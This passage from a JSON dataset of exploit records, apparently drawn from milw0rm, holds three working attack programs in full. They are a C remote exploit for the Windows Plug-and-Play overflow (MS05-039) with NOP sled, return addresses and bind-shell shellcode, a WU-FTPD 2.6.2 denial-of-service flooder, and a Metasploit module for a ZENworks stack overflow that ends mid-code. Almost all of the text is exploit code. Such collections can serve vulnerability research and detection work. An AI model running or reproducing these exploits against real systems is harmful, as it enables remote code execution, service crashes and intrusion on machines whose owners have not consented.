=\n\n\t\"\\x00\\x00\\x00\\x85\\xFF\\x53\\x4D\\x42\\x72\\x00\\x00\\x00\\x00\\x18\\x53\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x62\\x00\\x02\\x50\\x43\\x20\\x4E\\x45\\x54\\x57\\x4F\"\n\n\t\"\\x52\\x4B\\x20\\x50\\x52\\x4F\\x47\\x52\\x41\\x4D\\x20\\x31\\x2E\\x30\\x00\\x02\"\n\n\t\"\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x31\\x2E\\x30\\x00\\x02\\x57\\x69\\x6E\\x64\\x6F\"\n\n\t\"\\x77\\x73\\x20\\x66\\x6F\\x72\\x20\\x57\\x6F\\x72\\x6B\\x67\\x72\\x6F\\x75\\x70\"\n\n\t\"\\x73\\x20\\x33\\x2E\\x31\\x61\\x00\\x02\\x4C\\x4D\\x31\\x2E\\x32\\x58\\x30\\x30\"\n\n\t\"\\x32\\x00\\x02\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x32\\x2E\\x31\\x00\\x02\\x4E\\x54\"\n\n\t\"\\x20\\x4C\\x4D\\x20\\x30\\x2E\\x31\\x32\\x00\";\n\n\n\n\n\nunsigned char SMB_SessionSetupAndX[] =\n\n\t\"\\x00\\x00\\x00\\xA4\\xFF\\x53\\x4D\\x42\\x73\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\n\t\"\\x00\\x00\\x10\\x00\\x0C\\xFF\\x00\\xA4\\x00\\x04\\x11\\x0A\\x00\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x20\\x00\\x00\\x00\\x00\\x00\\xD4\\x00\\x00\\x80\\x69\\x00\\x4E\"\n\n\t\"\\x54\\x4C\\x4D\\x53\\x53\\x50\\x00\\x01\\x00\\x00\\x00\\x97\\x82\\x08\\xE0\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\\x77\\x00\\x73\\x00\\x20\\x00\"\n\n\t\"\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x32\\x00\\x31\\x00\\x39\\x00\"\n\n\t\"\\x35\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\\x77\\x00\"\n\n\t\"\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x35\\x00\"\n\n\t\"\\x2E\\x00\\x30\\x00\\x00\\x00\\x00\\x00\";\n\n\n\n\n\nunsigned char SMB_SessionSetupAndX2[] =\n\n\t\"\\x00\\x00\\x00\\xDA\\xFF\\x53\\x4D\\x42\\x73\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\n\t\"\\x00\\x08\\x20\\x00\\x0C\\xFF\\x00\\xDA\\x00\\x04\\x11\\x0A\\x00\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x57\\x00\\x00\\x00\\x00\\x00\\xD4\\x00\\x00\\x80\\x9F\\x00\\x4E\"\n\n\t\"\\x54\\x4C\\x4D\\x53\\x53\\x50\\x00\\x03\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x46\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x47\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x06\\x00\\x06\\x00\\x40\"\n\n\t\"\\x00\\x00\\x00\\x10\\x00\\x10\\x00\\x47\\x00\\x00\\x00\\x15\\x8A\\x88\\xE0\\x48\"\n\n\t\"\\x00\\x4F\\x00\\x44\\x00\\x00\\xED\\x41\\x2C\\x27\\x86\\x26\\xD2\\x59\\xA0\\xB3\"\n\n\t\"\\x5E\\xAA\\x00\\x88\\x6F\\xC5\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\"\n\n\t\"\\x77\\x00\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\"\n\n\t\"\\x32\\x00\\x31\\x00\\x39\\x00\\x35\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6E\\x00\"\n\n\t\"\\x64\\x00\\x6F\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\"\n\n\t\"\\x30\\x00\\x20\\x00\\x35\\x00\\x2E\\x00\\x30\\x00\\x00\\x00\\x00\\x00\";\n\n\n\n\n\nunsigned char SMB_TreeConnectAndX[] =\n\n\t\"\\x00\\x00\\x00\\x5A\\xFF\\x53\\x4D\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\n\t\"\\x00\\x08\\x30\\x00\\x04\\xFF\\x00\\x5A\\x00\\x08\\x00\\x01\\x00\\x2F\\x00\\x00\";\n\n\n\n\n\n\n\nunsigned char SMB_TreeConnectAndX_[] =\n\n\t\"\\x00\\x00\\x3F\\x3F\\x3F\\x3F\\x3F\\x00\";\n\n\n\n\n\n/* browser */\n\nunsigned char SMB_PipeRequest_browser[] =\n\n\t\"\\x00\\x00\\x00\\x66\\xFF\\x53\\x4D\\x42\\xA2\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\n\n\t\"\\x00\\x08\\x40\\x00\\x18\\xFF\\x00\\xDE\\xDE\\x00\\x10\\x00\\x16\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x9F\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x00\\x00\"\n\n\t\"\\x02\\x00\\x00\\x00\\x03\\x13\\x00\\x00\\x5C\\x00\\x62\\x00\\x72\\x00\\x6F\\x00\"\n\n\t\"\\x77\\x00\\x73\\x00\\x65\\x00\\x72\\x00\\x00\\x00\";\n\n\n\n\n\nunsigned char SMB_PNPEndpoint[] =\n\n/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */\n\n\t\"\\x00\\x00\\x00\\x9C\\xFF\\x53\\x4D\\x42\\x25\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\n\n\t\"\\x00\\x08\\x50\\x00\\x10\\x00\\x00\\x48\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x54\\x00\\x48\\x00\\x54\\x00\\x02\"\n\n\t\"\\x00\\x26\\x00\\x00\\x40\\x59\\x00\\x00\\x5C\\x00\\x50\\x00\\x49\\x00\\x50\\x00\"\n\n\t\"\\x45\\x00\\x5C\\x00\\x00\\x00\\x40\\x00\\x05\\x00\\x0B\\x03\\x10\\x00\\x00\\x00\"\n\n\t\"\\x48\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xB8\\x10\\xB8\\x10\\x00\\x00\\x00\\x00\"\n\n\t\"\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x40\\x4E\\x9F\\x8D\\x3D\\xA0\\xCE\\x11\"\n\n\t\"\\x8F\\x69\\x08\\x00\\x3E\\x30\\x05\\x1B\\x01\\x00\\x00\\x00\\x04\\x5D\\x88\\x8A\"\n\n\t\"\\xEB\\x1C\\xC9\\x11\\x9F\\xE8\\x08\\x00\\x2B\\x10\\x48\\x60\\x02\\x00\\x00\\x00\";\n\n\n\n\n\n\n\nunsigned char RPC_call[] =\n\n\t\"\\x00\\x00\\x08\\x90\\xFF\\x53\\x4D\\x42\\x25\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\n\n\t\"\\x00\\x08\\x60\\x00\\x10\\x00\\x00\\x3C\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x54\\x00\\x3C\\x08\\x54\\x00\\x02\"\n\n\t\"\\x00\\x26\\x00\\x00\\x40\\x4D\\x08\\x00\\x5C\\x00\\x50\\x00\\x49\\x00\\x50\\x00\"\n\n\t\"\\x45\\x00\\x5C\\x00\\x00\\x00\\x40\\x00\\x05\\x00\\x00\\x03\\x10\\x00\\x00\\x00\"\n\n\t\"\\x3C\\x08\\x00\\x00\\x01\\x00\\x00\\x00\\x24\\x08\\x00\\x00\\x00\\x00\\x36\\x00\"\n\n\t\"\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x52\\x00\\x4F\\x00\"\n\n\t\"\\x4F\\x00\\x54\\x00\\x5C\\x00\\x53\\x00\\x59\\x00\\x53\\x00\\x54\\x00\\x45\\x00\"\n\n\t\"\\x4D\\x00\\x5C\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\xFF\\xFF\\x00\\x00\\xE0\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\xC0\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\n\n\n\n\t/* jmp over - entry point */\n\n\t\"\\xEB\\x08\\x90\\x90\"\n\n\n\n\t/* pop reg; pop reg; retn; - umpnpmgr.dll */\n\n\t\"\\x67\\x15\\x7a\\x76\" /* 0x767a1567 */\n\n\n\n\t/* jmp ebx - umpnpmgr.dll\n\n\t\"\\x6f\\x36\\x7a\\x76\" */\n\n\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xEB\\x08\\x90\\x90\\x48\\x4F\\x44\\x88\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\";\n\n\n\n\n\nunsigned char RPC_call_end[] =\n\n\t\"\\xE0\\x07\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\n\n\n\n\n\nunsigned char bind_shellcode[] =\n\n\t\"\\x29\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x19\"\n\n\t\"\\xf5\\x04\\x37\\x83\\xeb\\xfc\\xe2\\xf4\\xe5\\x9f\\xef\\x7a\\xf1\\x0c\\xfb\\xc8\"\n\n\t\"\\xe6\\x95\\x8f\\x5b\\x3d\\xd1\\x8f\\x72\\x25\\x7e\\x78\\x32\\x61\\xf4\\xeb\\xbc\"\n\n\t\"\\x56\\xed\\x8f\\x68\\x39\\xf4\\xef\\x7e\\x92\\xc1\\x8f\\x36\\xf7\\xc4\\xc4\\xae\"\n\n\t\"\\xb5\\x71\\xc4\\x43\\x1e\\x34\\xce\\x3a\\x18\\x37\\xef\\xc3\\x22\\xa1\\x20\\x1f\"\n\n\t\"\\x6c\\x10\\x8f\\x68\\x3d\\xf4\\xef\\x51\\x92\\xf9\\x4f\\xbc\\x46\\xe9\\x05\\xdc\"\n\n\t\"\\x1a\\xd9\\x8f\\xbe\\x75\\xd1\\x18\\x56\\xda\\xc4\\xdf\\x53\\x92\\xb6\\x34\\xbc\"\n\n\t\"\\x59\\xf9\\x8f\\x47\\x05\\x58\\x8f\\x77\\x11\\xab\\x6c\\xb9\\x57\\xfb\\xe8\\x67\"\n\n\t\"\\xe6\\x23\\x62\\x64\\x7f\\x9d\\x37\\x05\\x71\\x82\\x77\\x05\\x46\\xa1\\xfb\\xe7\"\n\n\t\"\\x71\\x3e\\xe9\\xcb\\x22\\xa5\\xfb\\xe1\\x46\\x7c\\xe1\\x51\\x98\\x18\\x0c\\x35\"\n\n\t\"\\x4c\\x9f\\x06\\xc8\\xc9\\x9d\\xdd\\x3e\\xec\\x58\\x53\\xc8\\xcf\\xa6\\x57\\x64\"\n\n\t\"\\x4a\\xa6\\x47\\x64\\x5a\\xa6\\xfb\\xe7\\x7f\\x9d\\x1a\\x55\\x7f\\xa6\\x8d\\xd6\"\n\n\t\"\\x8c\\x9d\\xa0\\x2d\\x69\\x32\\x53\\xc8\\xcf\\x9f\\x14\\x66\\x4c\\x0a\\xd4\\x5f\"\n\n\t\"\\xbd\\x58\\x2a\\xde\\x4e\\x0a\\xd2\\x64\\x4c\\x0a\\xd4\\x5f\\xfc\\xbc\\x82\\x7e\"\n\n\t\"\\x4e\\x0a\\xd2\\x67\\x4d\\xa1\\x51\\xc8\\xc9\\x66\\x6c\\xd0\\x60\\x33\\x7d\\x60\"\n\n\t\"\\xe6\\x23\\x51\\xc8\\xc9\\x93\\x6e\\x53\\x7f\\x9d\\x67\\x5a\\x90\\x10\\x6e\\x67\"\n\n\t\"\\x40\\xdc\\xc8\\xbe\\xfe\\x9f\\x40\\xbe\\xfb\\xc4\\xc4\\xc4\\xb3\\x0b\\x46\\x1a\"\n\n\t\"\\xe7\\xb7\\x28\\xa4\\x94\\x8f\\x3c\\x9c\\xb2\\x5e\\x6c\\x45\\xe7\\x46\\x12\\xc8\"\n\n\t\"\\x6c\\xb1\\xfb\\xe1\\x42\\xa2\\x56\\x66\\x48\\xa4\\x6e\\x36\\x48\\xa4\\x51\\x66\"\n\n\t\"\\xe6\\x25\\x6c\\x9a\\xc0\\xf0\\xca\\x64\\xe6\\x23\\x6e\\xc8\\xe6\\xc2\\xfb\\xe7\"\n\n\t\"\\x92\\xa2\\xf8\\xb4\\xdd\\x91\\xfb\\xe1\\x4b\\x0a\\xd4\\x5f\\xf6\\x3b\\xe4\\x57\"\n\n\t\"\\x4a\\x0a\\xd2\\xc8\\xc9\\xf5\\x04\\x37\";\n\n\n\n#define SET_PORTBIND_PORT(buf, port) \\\n\n\t*(unsigned short *)(((buf)+186)) = (port)\n\n\n\n\n\nvoid\n\nconvert_name(char *out, char *name)\n\n{\n\n\tunsigned long len;\n\n\n\n\tlen = strlen(name);\n\n\tout += len * 2 - 1;\n\n\twhile (len--) {\n\n\t\t*out-- = '\\x00';\n\n\t\t*out-- = name[len];\n\n\t}\n\n}\n\n\n\n\n\n\n\nint\n\nmain (int argc, char **argv)\n\n{\n\n\tstruct sockaddr_in addr;\n\n\tstruct hostent *he;\n\n\tint len;\n\n\tint sockfd;\n\n\tunsigned short smblen;\n\n\tunsigned short bindport;\n\n\tunsigned char tmp[1024];\n\n\tunsigned char packet[4096];\n\n\tunsigned char *ptr;\n\n\tchar recvbuf[4096];\n\n\n\n#ifdef _WIN32\n\n\tWSADATA wsa;\n\n\tWSAStartup(MAKEWORD(2,0), &wsa);\n\n#endif\n\n\n\n\tprintf(\"\\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\\n\");\n\n\tprintf(\"\\t         Universal Exploit + no crash shellcode\\n\\n\\n\");\n\n\tprintf(\"\\t            Copyright (c) 2005 .: houseofdabus :.\\n\\n\\n\");\n\n\n\n\n\n\tif (argc < 3) {\n\n\t\tprintf(\"%s <host> <bind port>\\n\", argv[0]);\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif ((he = gethostbyname(argv[1])) == NULL) {\n\n\t\tprintf(\"[-] Unable to resolve %s\\n\", argv[1]);\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {\n\n\t\tprintf(\"[-] socket failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\taddr.sin_family = AF_INET;\n\n\taddr.sin_port = htons(445);\n\n\taddr.sin_addr = *((struct in_addr *)he->h_addr);\n\n\tmemset(&(addr.sin_zero), '\\0', 8);\n\n\n\n\n\n\n\n\tprintf(\"\\n[*] connecting to %s:445...\", argv[1]);\n\n\tif (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {\n\n\t\tprintf(\"\\n[-] connect failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\tprintf(\"ok\\n\");\n\n\n\n\tprintf(\"[*] null session...\");\n\n\tif (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif (len <= 10) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tptr = packet;\n\n\tmemcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);\n\n\tptr += sizeof(SMB_TreeConnectAndX)-1;\n\n\n\n\tsprintf(tmp, \"\\\\\\\\%s\\\\IPC$\", argv[1]);\n\n\tconvert_name(ptr, tmp);\n\n\tsmblen = strlen(tmp)*2;\n\n\tptr += smblen;\n\n\tsmblen += 9;\n\n\tmemcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);\n\n\n\n\tmemcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);\n\n\tptr += sizeof(SMB_TreeConnectAndX_)-1;\n\n\n\n\tsmblen = ptr-packet;\n\n\tsmblen -= 4;\n\n\tmemcpy(packet+3, &smblen, 1);\n\n\n\n\tif (send(sockfd, packet, ptr-packet, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tprintf(\"ok\\n\");\n\n\tprintf(\"[*] bind pipe...\");\n\n\n\n\tif (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tprintf(\"ok\\n\");\n\n\tprintf(\"[*] sending crafted packet...\");\n\n\n\n\t// nop\n\n\tptr = packet;\n\n\tmemset(packet, '\\x90', sizeof(packet));\n\n\n\n\t// header & offsets\n\n\tmemcpy(ptr, RPC_call, sizeof(RPC_call)-1);\n\n\tptr += sizeof(RPC_call)-1;\n\n\n\n\t// shellcode\n\n\tbindport = (unsigned short)atoi(argv[2]);\n\n\tbindport ^= 0x0437;\n\n\tSET_PORTBIND_PORT(bind_shellcode, htons(bindport));\n\n\tmemcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);\n\n\n\n\t// end of packet\n\n\tmemcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,\n\n\t\tRPC_call_end,\n\n\t\tsizeof(RPC_call_end)-1);\n\n\n\n\t// sending...\n\n\tif (send(sockfd, packet, 2196, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\tprintf(\"ok\\n\");\n\n\tprintf(\"[*] check your shell on %s:%i\\n\", argv[1], atoi(argv[2]));\n\n\n\n\trecv(sockfd, recvbuf, 4096, 0);\n\n\n\nreturn 0;\n\n}\n\n\n\n// milw0rm.com [2005-08-12]",
785        "vulnerable": true
786    },
787    {
788        "exploit_id": 115,
789        "content": "/*\n\n*\t\t (c) Rosiello Security\n\n*\n\n* Copyright Rosiello Security 2003\n\n*\t All Rights reserved.\n\n*\n\n* Tested on Red Hat 9.0\n\n*\n\n* Author: Angelo Rosiello\n\n* Mail\t: angelo rosiello org\n\n* This software is only for educational purpose.\n\n* Do not use it against machines different from yours.\n\n* Respect law.\n\n*\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <sys/types.h>\n\n#include <sys/socket.h>\n\n#include <netinet/in.h>\n\n#include <string.h>\n\n\n\nvoid addr_initialize( );\n\nvoid usage( );\n\n\n\nint main( int argc, char **argv )\n\n{\n\n\tint i, sd, PORT, loop, error;\n\n\tchar user[30], password[30], ch;\n\n\tstruct sockaddr_in server_addr;\n\n\n\n\tfprintf( stdout, \"\\n(c) Rosiello Security 2003\\n\" );\n\n\tfprintf( stdout, \"http://www.rosiello.org\\n\" );\n\n\tfprintf( stdout, \"WU-FTPD 2.6.2 Freezer by Angelo Rosiello\\n\\n\" );\n\n\n\n\tif( argc != 6 ) usage( argv[0] );\n\n\n\n\tif( strlen( argv[3] ) > 20 ) exit( 0 );\n\n\tif( strlen( argv[4] ) > 20 ) exit( 0 );\n\n\n\n\tsprintf( user, \"USER %s\\n\", argv[3] );\n\n\tsprintf( password, \"PASS %s\\n\", argv[4] );\n\n\n\n\tPORT = atoi( argv[2] );\n\n\tloop = atoi( argv[5] );\n\n\n\n\taddr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));\n\n\tsd = socket( AF_INET, SOCK_STREAM, 0 );\n\n\n\n\terror = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));\n\n\tif( error != 0 )\n\n\t{\n\n\t\tperror( \"Something wrong with the connection\" );\n\n\t\texit( 0 );\n\n\t}\n\n\n\n\twhile ( ch != '\\n' )\n\n\t{\n\n\t\trecv( sd, &ch, 1, 0);\n\n\t\tprintf(\"%c\", ch );\n\n\t}\n\n\n\n\tch = '\\0';\n\n\n\n\tprintf( \"Connection executed, now waiting to log in...\\n\" );\n\n\n\n\tprintf( \"%s\", user );\n\n\n\n\tsend( sd, user, strlen( user ), 0 );\n\n\twhile ( ch != '\\n' )\n\n\t{\n\n\t\trecv( sd, &ch, 1, 0);\n\n\t\tprintf(\"%c\", ch );\n\n\t}\n\n\tprintf( \"%s\", password );\n\n\n\n\tch = '\\0';\n\n\n\n\tsend( sd, password, strlen( password ), 0 );\n\n\twhile ( ch != '\\n' )\n\n\t{\n\n\t\trecv( sd, &ch, 1, 0);\n\n\t\tprintf(\"%c\", ch );\n\n\t}\n\n\n\n\tprintf( \"Sending the DoS query\\n\" );\n\n\tfor( i=0; i<loop; i++ )\n\n\t{\n\n\t\twrite( sd, \"LIST -w 1000000 -C\\n\", 19 );\n\n\t}\n\n\tprintf( \"All done\\n\" );\n\n\tclose( sd );\n\n\treturn 0;\n\n}\n\n\n\nvoid addr_initialize (struct sockaddr_in *address, int port, long IPaddr)\n\n{\n\n\taddress -> sin_family = AF_INET;\n\n\taddress -> sin_port = htons((u_short)port);\n\n\taddress -> sin_addr.s_addr = IPaddr;\n\n}\n\n\n\nvoid usage( char *program )\n\n{\n\n\tfprintf(stdout, \"USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\\n\", program);\n\n\texit(0);\n\n}\n\n\n\n\n\n// milw0rm.com [2003-10-31]",
790        "vulnerable": true
791    },
792    {
793        "exploit_id": 1150,
794        "content": "#\n\n#\n\n\n\npackage Msf::Exploit::zenworks_desktop_agent;\n\nuse strict;\n\nuse base \"Msf::Exploit\";\n\nuse Pex::Text;\n\n\n\nmy $advanced = { };\n\n\n\nmy $info =\n\n  {\n\n\t'Name'  => 'ZENworks 6.5 Desktop/Server Management Remote Stack Overflow',\n\n\t'Version'  => '$Revision: 1.1 $',\n\n\t'Authors' =>\n\n\t  [\n\n\t\t'Anonymous',\n\n\t  ],\n\n\t'Arch'  => [ 'x86' ],\n\n\t'OS'    => [ 'win32', 'winxp', 'win2k', 'win2003' ],\n\n\t'Priv'  => 1,\n\n\n\n\t'UserOpts'  =>\n\n\t  {\n\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\n\n\t\t'RPORT' => [1, 'PORT', 'The target port', 1761 ],\n\n\t  },\n\n\t  \n\n\t'Payload' =>\n\n\t  {\n\n\t\t'Space'     => 0x7FFF,\n\n\t\t'BadChars'  => \"\\x00\",\n\n\t\t'Keys'      => ['+ws2ord'],\n\n\t  },\n\n\n\n\t'Description'  => Pex::Text::Freeform(qq{\n\n\t\tThis module exploits a heap overflow in the Novell ZENworks\n\n        Desktop Management agent.\n\n}),\n\n\n\n\t'Refs'  =>\n\n\t  [\n\n\t\t['BID', 13678],\n\n\t  ],  \n\n\t \n\n\t'Targets' =>\n\n\t  [\n\n\t\t[ 'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent', 0x10002e06]\n\n\t  ],\n\n\t  \n\n\t'Keys'  => ['zenworks'],\n\n};\n\n\n\nsub new {\n\n\tmy $class = shift;\n\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\n\treturn($self);\n\n}\n\n\n\nsub Exploit {\n\n\tmy $self        = shift;\n\n\tmy $target_host = $self->GetVar('RHOST');\n\n\tmy $target_port = $self->GetVar('RPORT');\n\n\tmy $target_idx  = $self->GetVar('TARGET');\n\n\tmy $shellcode   = $self->GetVar('EncodedPayload')->Payload;\n\n\tmy $target      = $self->Targets->[$target_idx];\n\n\n\n\t$self->PrintLine( \"[*] Attempting to exploit \" . $target->[0] );\n\n\n\n\tmy $s = Msf::Socket::Tcp->new(\n\n\t\t'PeerAddr'  => $target_host,\n\n\t\t'PeerPort'  => $target_port,\n\n\t\t'LocalPort' => $self->GetVar('CPORT'),\n\n\t  );\n\n\n\n\tif ( $s->IsError ) {\n\n\t\t$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );\n\n\t\treturn;\n\n\t}\n\n\n\n        my $req = \"\\x00\\x06\\x05\\x01\\x10\\xe6\\x01\\x00\\x34\\x5a\\xf4\\x77\\x80\\x95\\xf8\\x77\";\n\n        $self->PrintLine( \"[*] Sending version identication\" );\n\n\t$s->Send($req);\n\n\n\n        my $ident = $s->Recv(-1, 16);\n\n        if (length($ident) != 16)\n\n        {\n\n         $self->PrintLine( \"[*] Failed to receive agent version identication\" );\n\n         return;\n\n        }\n\n        else\n\n        {\n\n         $self->PrintLine( \"[*] Received agent version identication\" );\n\n        }\n\n\n\n        $req = \"\\x00\\x01\";\n\n        $self->PrintLine( \"[*] Sending client acknowledgment\" );\n\n\t$s->Send($req);\n\n\n\n        # stack overflow in ZenRem32.exe / ZENworks Server Management\n\n\n\n\t$req = \"\\x00\\x06metmet\\x00\\x06metmet\\x7F\\xFF\" . $shellcode . \"\\x00\\x01\";\n\n        $self->PrintLine( \"[*] Sending authentication data (including shellcode)\" );\n\n        $s->Send($req);\n\n\n\n\t$s->Recv(2, 2);\n\n\t$s->Send(\"\\x00\\x01\");\n\n        \n\n        